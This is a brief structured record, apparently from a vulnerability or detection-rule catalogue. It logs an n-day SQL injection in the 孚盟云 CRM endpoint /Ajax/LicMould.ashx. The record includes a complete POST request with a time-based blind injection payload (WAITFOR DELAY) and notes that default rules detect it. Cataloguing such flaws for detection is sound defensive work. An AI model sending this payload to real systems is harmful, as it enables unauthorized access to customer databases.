vendor = "孚盟云"
name = "孚盟云CRM /LicMould.ashx SQL注入"
type = "SQL注入"
version = "未知"
path = "/Ajax/LicMould.ashx"
detail = "POST /Ajax/LicMould.ashx HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Content-Length: 123 action=DeleteEmp&key=1%20WAITFOR%20DELAY%20’0:0:4′–&fuids=abc,def,"
fix = "缺省规则可检出"
date = "0711"
label = "nday"
verifier = "AdySec"
